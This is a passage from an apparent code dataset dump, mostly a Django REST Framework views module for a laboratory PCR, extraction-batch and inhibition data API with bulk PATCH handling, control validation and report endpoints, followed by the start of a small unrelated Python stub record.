ExtractionBatchViewSet(HistoryViewSet):\n queryset = ExtractionBatch.objects.all()\n\n # override the default serializer_class if summary fields are requested\n def get_serializer_class(self):\n include_summary_fields = self.request.query_params.get('includeSummaryFields', None)\n if include_summary_fields is not None and include_summary_fields.lower() == 'true':\n return ExtractionBatchSummarySerializer\n else:\n return ExtractionBatchSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(ExtractionBatchViewSet, self).get_serializer(*args, **kwargs)\n\n # override the default DELETE method to prevent deletion of an ExtractionBatch with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch__extraction_batch=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"An Extraction Batch may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(ExtractionBatchViewSet, self).destroy(request, *args, **kwargs)\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n eb_id = item.pop('id')\n eb = ExtractionBatch.objects.filter(id=eb_id).first()\n item['modified_by'] = request.user\n\n # remove nulls coming from client (user not actually sending nulls, so no 
need to trigger recalcs)\n if 'ext_pos_rna_rt_cq_value' in item and item['ext_pos_rna_rt_cq_value'] is None:\n item.pop('ext_pos_rna_rt_cq_value')\n if 'ext_pos_dna_cq_value' in item and item['ext_pos_dna_cq_value'] is None:\n item.pop('ext_pos_dna_cq_value')\n\n if eb:\n serializer = self.get_serializer(eb, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n is_valid = False\n message = \"No ExtractionBatch exists with this ID: \" + str(eb_id)\n response_errors.append({\"extractionbatch\": message})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n rep = ExtractionBatch.objects.filter(id=pk).first()\n if rep:\n serializer = self.serializer_class(rep, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n message = \"No ExtractionBatch exists with this ID: \" + str(pk)\n return JsonResponse({\"extractionbatch\": message}, status=400)\n\n\nclass ReverseTranscriptionViewSet(HistoryViewSet):\n queryset = ReverseTranscription.objects.all()\n serializer_class = ReverseTranscriptionSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(ReverseTranscriptionViewSet, self).get_serializer(*args, **kwargs)\n\n # override the default DELETE method to prevent deletion of a ReverseTranscription with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch__extraction_batch__reversetranscriptions=self.get_object().id).exclude(\n cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"A Reverse Transcription may not be deleted\"\n message += \" if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(ReverseTranscriptionViewSet, self).destroy(request, *args, **kwargs)\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n rt_id = item.pop('id')\n rt = ReverseTranscription.objects.filter(id=rt_id).first()\n if rt:\n serializer = self.serializer_class(rt, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n 
valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n is_valid = False\n response_errors.append(\n {\"reversetranscription\": \"No ReverseTranscription exists with this ID: \" + str(rt_id)})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n rep = ReverseTranscription.objects.filter(id=pk).first()\n if rep:\n serializer = self.serializer_class(rep, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n return JsonResponse(\n {\"reversetranscription\": \"No ReverseTranscription exists with this ID: \" + str(pk)}, status=400)\n\n\nclass SampleExtractionViewSet(HistoryViewSet):\n queryset = SampleExtraction.objects.all()\n serializer_class = SampleExtractionSerializer\n\n @action(detail=False)\n def inhibition_report(self, request):\n sample = request.query_params.get('sample', None)\n report_type = ReportType.objects.filter(id=1).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_inhibition_report.delay(sample, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Inhibition Report received.\"}, status=200)\n\n # override the default DELETE method to prevent deletion of a SampleExtraction with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n sample_extraction=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"A Sample Extraction may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(SampleExtractionViewSet, self).destroy(request, *args, **kwargs)\n\n\nclass PCRReplicateViewSet(HistoryViewSet):\n serializer_class = PCRReplicateSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(PCRReplicateViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n queryset = PCRReplicate.objects.all()\n id = self.request.query_params.get('id', None)\n if id is not None:\n if LIST_DELIMETER in id:\n id_list = id.split(',')\n queryset = queryset.filter(id__in=id_list)\n else:\n queryset = queryset.filter(id__exact=id)\n return queryset\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n rep_id = 
item.pop('id')\n rep = PCRReplicate.objects.filter(id=rep_id).first()\n if rep:\n new_invalid = item.get('invalid', None)\n if new_invalid is not None and new_invalid != rep.invalid:\n item['invalid_override'] = request.user.id\n rep.replicate_concentration = rep.calc_rep_conc()\n serializer = self.serializer_class(rep, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n is_valid = False\n response_errors.append({\"pcrreplicate\": \"No PCRReplicate exists with this ID: \" + str(rep_id)})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n rep = PCRReplicate.objects.filter(id=pk).first()\n if rep:\n new_invalid = request_data.get('invalid', None)\n if new_invalid is not None and new_invalid != rep.invalid:\n if request_data.get('invalid_override', None) is None:\n request_data['invalid_override'] = request.user.id\n serializer = self.serializer_class(rep, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n return JsonResponse({\"pcrreplicate\": \"No PCRReplicate exists with this ID: \" + str(pk)}, status=400)\n\n\nclass PCRReplicateBatchViewSet(HistoryViewSet):\n serializer_class = PCRReplicateBatchSerializer\n\n def isnumber(self, val):\n try:\n return True if float(val) == 0 else float(val)\n except ValueError:\n return False\n\n def err_obj(self, field, message, severity):\n return {\"field\": field, \"message\": message, \"severity\": severity}\n\n def validate_controls(self, field):\n synonym = \" ('cp')\" if 'cq_value' in field else \" ('concentration')\" if 'gc_reaction' in field else ''\n invalid_reason = None\n if field not in self.request.data:\n invalid_reason = self.err_obj(field, field + synonym + \" is missing\", 2)\n elif self.request.data[field] is not None:\n if not self.isnumber(self.request.data[field]):\n invalid_reason = self.err_obj(field, field + synonym + \" is not a number\", 1)\n elif self.request.data[field] > Decimal('0') and field not in ['pcr_pos_cq_value', 'pcr_pos_gc_reaction']:\n # eventually we will also validate pcr_pos_cq_value by testing if it is >0.5 cylces from expected\n invalid_reason = self.err_obj(field, field + synonym + \" is positive\", 1)\n return invalid_reason\n\n @action(methods=['post'], detail=False)\n def bulk_load_negatives(self, request):\n\n is_valid = True\n valid_data = []\n response_errors = []\n for item in request.data:\n item_validation_errors = []\n if 'extraction_batch' not in item:\n item_validation_errors.append(\"extraction_batch is required\")\n if 'target' not in item:\n item_validation_errors.append(\"target is required\")\n if 'replicate_number' not in item:\n item_validation_errors.append(\"replicate_number is required\")\n if 'pcr_pos_cq_value' not in item:\n item_validation_errors.append(\"pcr_pos_cq_value is required\")\n if len(item_validation_errors) > 
0:\n is_valid = False\n response_errors.append(item_validation_errors)\n continue\n\n pcrreplicate_batch = PCRReplicateBatch.objects.filter(\n extraction_batch=item['extraction_batch'], target=item['target'],\n replicate_number=item['replicate_number']).first()\n\n if pcrreplicate_batch:\n if not is_valid:\n continue\n else:\n item.pop('extraction_batch')\n item.pop('target')\n item.pop('replicate_number')\n item['ext_neg_cq_value'] = 0\n item['ext_neg_gc_reaction'] = 0\n item['rt_neg_cq_value'] = 0\n item['rt_neg_gc_reaction'] = 0\n item['pcr_neg_cq_value'] = 0\n item['pcr_neg_gc_reaction'] = 0\n item['pcr_pos_gc_reaction'] = 0\n item['updated_pcrreplicates'] = []\n\n pcrreplicates = PCRReplicate.objects.filter(pcrreplicate_batch=pcrreplicate_batch.id)\n for rep in pcrreplicates:\n item['updated_pcrreplicates'].append(\n {\"sample\": rep.sample_extraction.sample.id, \"cq_value\": 0, \"gc_reaction\": 0})\n\n serializer = self.serializer_class(pcrreplicate_batch, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n message = \"No PCR replicate batch was found with extraction batch of \" + str(item['extraction_batch'])\n message += \" and target of \" + str(item['target'])\n message += \" and replicate number of \" + str(item['replicate_number'])\n is_valid = False\n response_errors.append({\"pcrreplicatebatch\": message})\n\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n response_data = []\n for item in valid_data:\n item.save()\n # recalc the child rep validity\n reps = PCRReplicate.objects.filter(pcrreplicate_batch=item.data['id'])\n for rep in reps:\n if rep.invalid_override is None:\n rep.invalid = rep.calc_invalid()\n rep.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n\n @action(methods=['post'], detail=False)\n def validate(self, request):\n validation_errors = []\n if 'analysis_batch' not in request.data:\n validation_errors.append(\"analysis_batch is required\")\n if 'extraction_number' not in request.data:\n validation_errors.append(\"extraction_number is required\")\n if 'target' not in request.data:\n validation_errors.append(\"target is required\")\n if 'replicate_number' not in request.data:\n validation_errors.append(\"replicate_number is required\")\n if len(validation_errors) > 0:\n return Response(validation_errors)\n\n extraction_batch = ExtractionBatch.objects.filter(\n analysis_batch=request.data['analysis_batch'],\n extraction_number=request.data['extraction_number']\n ).first()\n\n if not extraction_batch:\n message = \"No extraction batch was found with analysis batch of \" + str(request.data['analysis_batch'])\n message += \" and extraction number of \" + str(request.data['extraction_number'])\n return Response({\"extraction_batch\": message})\n\n target = Target.objects.filter(id=request.data['target']).first()\n\n if not target:\n message = \"No target was found with ID of \" + str(request.data['target'])\n return Response({\"target\": message})\n\n pcrreplicate_batch = PCRReplicateBatch.objects.filter(\n extraction_batch=extraction_batch.id,\n target=target.id,\n 
replicate_number=request.data['replicate_number']\n ).first()\n\n if not pcrreplicate_batch:\n message = \"No PCR replicate batch was found with extraction batch of \" + str(extraction_batch.id)\n message += \" and target of \" + str(request.data['target'])\n message += \" and replicate number of \" + str(request.data['replicate_number'])\n return Response({\"pcrreplicate_batch\": message}, status=400)\n\n rna = True if target.nucleic_acid_type.name == 'RNA' else False\n\n # start building up the response object\n field_validations = {\n \"id\": pcrreplicate_batch.id,\n \"ext_neg_invalid\": False,\n \"rt_neg_invalid\": False,\n \"pcr_neg_invalid\": False,\n \"pcr_pos_invalid\": False\n }\n\n # populate the response object with the submitted control values and the control validations\n control_fields = ['ext_neg_cq_value', 'ext_neg_gc_reaction', 'rt_neg_cq_value', 'rt_neg_gc_reaction',\n 'pcr_neg_cq_value', 'pcr_neg_gc_reaction', 'pcr_pos_cq_value', 'pcr_pos_gc_reaction']\n control_validations = []\n for field in control_fields:\n field_validations[field] = request.data[field] if field in request.data else None\n # exclude RT fields if this is a DNA target\n if 'rt' not in field or rna:\n validation_error = self.validate_controls(field)\n if validation_error:\n control_validations.append(validation_error)\n if \"ext_neg\" in field:\n field_validations[\"ext_neg_invalid\"] = True\n elif \"rt_neg\" in field:\n field_validations[\"rt_neg_invalid\"] = True\n elif \"pcr_neg\" in field:\n field_validations[\"pcr_neg_invalid\"] = True\n elif \"pcr_pos\" in field:\n field_validations[\"pcr_pos_invalid\"] = True\n field_validations[\"validation_errors\"] = control_validations\n\n # check that pcrreplicates have been submitted\n if 'updated_pcrreplicates' not in request.data or not request.data['updated_pcrreplicates']:\n field_validations[\"updated_pcrreplicates\"] = [(\"updated_pcrreplicates is missing\", 2)]\n else:\n # validate pcrreplicates\n existing_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch=pcrreplicate_batch.id).order_by('sample_extraction__sample__id')\n all_pcrreplicates_validations = []\n updated_pcrreplicates = request.data.get('updated_pcrreplicates')\n updated_pcrreplicates_sample_ids = [rep['sample'] for rep in updated_pcrreplicates]\n\n for existing_rep in existing_pcrreplicates:\n sample_id = existing_rep.sample_extraction.sample.id\n rep_validations = []\n\n # attempt to find the matching updated rep\n try:\n rep_index = updated_pcrreplicates_sample_ids.index(sample_id)\n # pop the matching updated rep from its list so that we eventually end up with an empty list,\n # or a list of extraneous reps\n updated_rep = updated_pcrreplicates.pop(rep_index)\n # also remove the parallel sample ID so that the two lists continue to have matching indexes\n del updated_pcrreplicates_sample_ids[rep_index]\n\n # start building up the response object\n response_rep = {\"sample\": sample_id}\n\n rep_validations = []\n\n # check if this rep has already been uploaded\n if existing_rep.cq_value is not None:\n message = \"sample \" + str(sample_id) + \" has already been uploaded for this PCR replicate batch\"\n rep_validations.append(self.err_obj(\"cq_value\", message, 1))\n\n # validate cq_value\n # remember that null is an acceptable value\n if 'cq_value' not in updated_rep:\n rep_validations.append(self.err_obj(\"cq_value\", \"cq_value ('cp') is missing\", 2))\n else:\n rep_cq_value = updated_rep['cq_value']\n response_rep['cq_value'] = rep_cq_value\n if rep_cq_value is not 
None:\n if not self.isnumber(rep_cq_value):\n rep_validations.append(self.err_obj(\"cq_value\", \"cq_value ('cp') is not a number\", 1))\n elif rep_cq_value < Decimal('0'):\n rep_validations.append(self.err_obj(\"cq_value\", \"cq_value ('cp') is less than zero\", 2))\n\n # validate gc_reaction\n # remember that null is an acceptable value\n if 'gc_reaction' not in updated_rep:\n message = \"gc_reaction ('concentration') is missing\"\n rep_validations.append(self.err_obj(\"gc_reaction\", message, 2))\n else:\n rep_gc_reaction = updated_rep['gc_reaction']\n response_rep['gc_reaction'] = rep_gc_reaction\n if rep_gc_reaction is not None:\n if not self.isnumber(rep_gc_reaction):\n message = \"gc_reaction ('concentration') is not a number\"\n rep_validations.append(self.err_obj(\"gc_reaction\", message, 1))\n response_rep['gc_reaction_sci'] = ''\n elif rep_gc_reaction < Decimal('0'):\n message = \"gc_reaction ('concentration') is less than zero\"\n rep_validations.append(self.err_obj(\"gc_reaction\", message, 2))\n response_rep['gc_reaction_sci'] = get_sci_val(rep_gc_reaction)\n else:\n response_rep['gc_reaction_sci'] = get_sci_val(rep_gc_reaction)\n else:\n response_rep['gc_reaction'] = None\n response_rep['gc_reaction_sci'] = ''\n\n response_rep['validation_errors'] = rep_validations\n all_pcrreplicates_validations.append(response_rep)\n\n # no matching updated_rep was found\n except ValueError:\n # start building up the response object\n response_rep = {\"sample\": sample_id}\n\n message = \"sample \" + str(sample_id) + \" expected but not found in submission\"\n rep_validations.append(self.err_obj(\"sample\", message, 2))\n\n response_rep['validation_errors'] = rep_validations\n all_pcrreplicates_validations.append(response_rep)\n\n # now list out the other updated reps that were submitted but do not belong to this batch\n for extraneous_rep in updated_pcrreplicates:\n rep_validations = []\n sample_id = \"(No Sample ID)\"\n if 'sample' not in extraneous_rep or extraneous_rep['sample'] is None:\n validation_error = self.err_obj(\"sample\", \"sample is a required field\", 1)\n else:\n sample_id = str(extraneous_rep.get('sample'))\n message = \"sample \" + sample_id + \" is not in this PCR replicate batch\"\n validation_error = self.err_obj(\"sample\", message, 1)\n\n # start building up the response object\n response_rep = {\"sample\": sample_id}\n if 'cq_value' not in extraneous_rep:\n continue\n else:\n rep_cq_value = extraneous_rep['cq_value']\n response_rep['cq_value'] = rep_cq_value\n if 'gc_reaction' not in extraneous_rep:\n continue\n else:\n rep_gc_reaction = extraneous_rep['gc_reaction']\n response_rep['gc_reaction'] = rep_gc_reaction\n if not self.isnumber(rep_gc_reaction):\n response_rep['gc_reaction_sci'] = ''\n else:\n response_rep['gc_reaction_sci'] = get_sci_val(rep_gc_reaction)\n\n rep_validations.append(validation_error)\n response_rep['validation_errors'] = rep_validations\n all_pcrreplicates_validations.append(response_rep)\n\n field_validations[\"updated_pcrreplicates\"] = all_pcrreplicates_validations\n\n return JsonResponse(field_validations, safe=False, status=200)\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n queryset = PCRReplicateBatch.objects.all()\n # if ID is in query, only search by ID and ignore other params\n batch = self.request.query_params.get('id', None)\n if batch is not None:\n queryset = queryset.filter(id__exact=batch)\n # else, search by other params (that don't include ID)\n else:\n analysis_batch = 
self.request.query_params.get('analysis_batch', None)\n extraction_number = self.request.query_params.get('extraction_number', None)\n if analysis_batch is not None and extraction_number is not None:\n queryset = queryset.filter(extraction_batch__analysis_batch__exact=analysis_batch,\n extraction_batch__extraction_number__exact=extraction_number)\n target = self.request.query_params.get('target', None)\n if target is not None:\n queryset = queryset.filter(target__exact=target)\n replicate_number = self.request.query_params.get('replicate_number', None)\n if replicate_number is not None:\n queryset = queryset.filter(replicate_number__exact=replicate_number)\n return queryset\n\n # override the default DELETE method to prevent deletion of a PCRReplicateBatch with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"A PCR Replicate Batch may not be deleted\"\n message += \" if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(PCRReplicateBatchViewSet, self).destroy(request, *args, **kwargs)\n\n\nclass StandardCurveViewSet(HistoryViewSet):\n queryset = StandardCurve.objects.all()\n serializer_class = StandardCurveSerializer\n\n\nclass InhibitionViewSet(HistoryViewSet):\n queryset = Inhibition.objects.all()\n serializer_class = InhibitionSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(InhibitionViewSet, self).get_serializer(*args, **kwargs)\n\n # override the default DELETE method to prevent deletion of an Inhibition with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates_dna = PCRReplicate.objects.filter(\n sample_extraction__inhibition_dna=self.get_object().id).exclude(cq_value__isnull=True)\n nonnull_pcrreplicates_rna = PCRReplicate.objects.filter(\n sample_extraction__inhibition_rna=self.get_object().id).exclude(cq_value__isnull=True)\n nonnull_pcrreplicates = nonnull_pcrreplicates_dna.union(nonnull_pcrreplicates_rna).distinct()\n if any(nonnull_pcrreplicates):\n message = \"An Inhibition may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(InhibitionViewSet, self).destroy(request, *args, **kwargs)\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n inhib = item.pop('id')\n inhibition = Inhibition.objects.filter(id=inhib).first()\n if inhibition:\n serializer = self.serializer_class(inhibition, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n 
response_errors.append(serializer.errors)\n else:\n is_valid = False\n response_errors.append({\"inhibition\": \"No Inhibition exists with this ID: \" + str(inhib)})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n inhibition = Inhibition.objects.filter(id=pk).first()\n if inhibition:\n serializer = self.serializer_class(inhibition, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n return JsonResponse({\"inhibition\": \"No Inhibition exists with this ID: \" + str(pk)}, status=400)\n\n\nclass SampleInhibitionViewSet(HistoryViewSet):\n serializer_class = SampleInhibitionSerializer\n\n # override the default queryset to allow filtering by URL arguments\n # if sample ID is in query, only search by sample ID and ignore other params\n def get_queryset(self):\n queryset = Sample.objects.all()\n # filter by sample IDs, exact list\n sample = self.request.query_params.get('id', None)\n if sample is not None:\n sample_list = sample.split(',')\n queryset = queryset.filter(id__in=sample_list)\n # else, search by other params (that don't include sample ID)\n else:\n # filter by analysis batch ID, exact\n analysis_batch = self.request.query_params.get('analysis_batch', None)\n if analysis_batch is not None:\n queryset = queryset.filter(analysis_batches__in=analysis_batch)\n return queryset\n\n\nclass InhibitionCalculateDilutionFactorView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def post(self, request):\n request_data = JSONParser().parse(request)\n ab = request_data.get('analysis_batch', None)\n en = request_data.get('extraction_number', None)\n na = request_data.get('nucleic_acid_type', None)\n eb = ExtractionBatch.objects.filter(analysis_batch=ab, extraction_number=en).first()\n if eb:\n serializer = InhibitionCalculateDilutionFactorSerializer(data=request_data)\n if serializer.is_valid():\n is_valid = True\n response_data = []\n response_errors = []\n pos = request_data.get('inh_pos_cq_value', None)\n inhibitions = request_data.get('inhibitions', None)\n for inhibition in inhibitions:\n cq = inhibition.get('cq_value', None)\n sample = inhibition.get('sample', None)\n inhib = Inhibition.objects.filter(sample=sample, extraction_batch=eb, nucleic_acid_type=na).first()\n if inhib:\n suggested_dilution_factor = None\n # only compute the Cq difference when a sample Cq was reported (abs(pos - None) would raise a TypeError)\n diff = abs(pos - cq) if cq else None\n # If INH CONT Cq minus Sample Cq<2 cycles, then dilution factor = 1 (no dilution)\n # If INH CONT Cq minus Sample Cq>=2 cycles AND Sample Cq<36, then dilution factor = 5\n # If INH CONT Cq minus Sample Cq>2 cycles AND Sample Cq>36 or no Cq, then dilution factor = 10\n if not cq:\n suggested_dilution_factor = 10\n elif 0.0 <= diff < 2.0:\n suggested_dilution_factor = 1\n elif diff >= 2.0 and cq < 36.0:\n suggested_dilution_factor = 5\n elif diff > 2.0 and cq > 36.0:\n suggested_dilution_factor = 10\n new_data = {\"id\": inhib.id, \"sample\": sample, \"cq_value\": cq,\n \"suggested_dilution_factor\": suggested_dilution_factor,\n \"extraction_batch\": eb.id}\n response_data.append(new_data)\n else:\n is_valid = False\n message = \"No Inhibition exists with Sample ID: \" + 
str(sample)\n message += \", Extraction Batch ID: \" + str(eb) + \", Nucleic Acid Type ID: \" + str(na)\n response_errors.append({\"inhibition\": message})\n if is_valid:\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n return Response(serializer.errors, status=400)\n else:\n message = \"No Extraction Batch exists with Analysis Batch ID: \" + str(ab)\n message += \" and Extraction Number: \" + str(en)\n return JsonResponse({\"extraction_batch\": message}, status=400)\n\n\nclass TargetViewSet(HistoryViewSet):\n queryset = Target.objects.all()\n serializer_class = TargetSerializer\n\n\n######\n#\n# Misc\n#\n######\n\n\nclass FieldUnitViewSet(HistoryViewSet):\n queryset = FieldUnit.objects.all()\n serializer_class = FieldUnitSerializer\n\n\nclass NucleicAcidTypeViewSet(HistoryViewSet):\n queryset = NucleicAcidType.objects.all()\n serializer_class = NucleicAcidTypeSerializer\n\n\nclass RecordTypeViewSet(HistoryViewSet):\n queryset = RecordType.objects.all()\n serializer_class = RecordTypeSerializer\n\n\nclass OtherAnalysisViewSet(HistoryViewSet):\n queryset = OtherAnalysis.objects.all()\n serializer_class = OtherAnalysisSerializer\n\n\n######\n#\n# Users\n#\n######\n\n\nclass UserViewSet(HistoryViewSet):\n serializer_class = UserSerializer\n\n def get_queryset(self):\n # do not return the admin and public users\n queryset = User.objects.all().exclude(id__in=[1])\n # filter by username, exact\n username = self.request.query_params.get('username', None)\n if username is not None:\n queryset = queryset.filter(username__exact=username)\n return queryset\n\n\nclass AuthView(views.APIView):\n authentication_classes = (CustomBasicAuthentication,)\n serializer_class = UserSerializer\n\n def post(self, request):\n\n # remove all sessions to prevent CSRF missing error on subsequent basic auth requests\n if request.user:\n user_sessions = []\n all_sessions = Session.objects.filter(expire_date__gte=timezone.now())\n for session in all_sessions:\n if str(request.user.id) == session.get_decoded().get('_auth_user_id'):\n user_sessions.append(session.pk)\n Session.objects.filter(pk__in=user_sessions).delete()\n\n resp = Response(self.serializer_class(request.user).data)\n\n # attempt to remove CSRF and session cookies\n resp.delete_cookie('csrftoken')\n resp.delete_cookie('sessionid')\n\n return resp\n\n\n######\n#\n# Reports\n#\n######\n\n\nclass QualityControlReportView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def post(self, request):\n request_data = JSONParser().parse(request)\n samples = request_data.get('samples', None)\n report_type = ReportType.objects.filter(id=4).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_quality_control_report.delay(samples, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Quality Control Report received.\"}, status=200)\n\n\nclass ControlsResultsReportView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def post(self, request):\n request_data = JSONParser().parse(request)\n sample_ids = request_data.get('samples', None)\n target_ids = request_data.get('targets', None)\n report_type = ReportType.objects.filter(id=5).first()\n status = 
Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_control_results_report.delay(sample_ids, target_ids, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Control Results Report received.\"}, status=200)\n\n\nclass ReportFileViewSet(viewsets.ReadOnlyModelViewSet):\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = ReportFileSerializer\n\n def get_queryset(self):\n queryset = ReportFile.objects.all()\n query_params = self.request.query_params\n # filter by report_type, exact list\n report_type = query_params.get('report_type', None)\n if report_type is not None:\n if LIST_DELIMETER in report_type:\n report_type_list = report_type.split(LIST_DELIMETER)\n queryset = queryset.filter(report_type__in=report_type_list)\n else:\n queryset = queryset.filter(report_type__exact=report_type)\n return queryset\n\n\nclass ReportTypeViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated,)\n queryset = ReportType.objects.all()\n serializer_class = ReportTypeSerializer\n\n\nclass StatusViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated,)\n queryset = Status.objects.all()\n serializer_class = StatusSerializer\n"} {"ext": "py", "sha": "1a2fbb3f9d4cbb78cfc718b436a869fb005a7f82", "content": "import typing\n\ndef format_exc(): pass"} {"ext": "py", "sha": 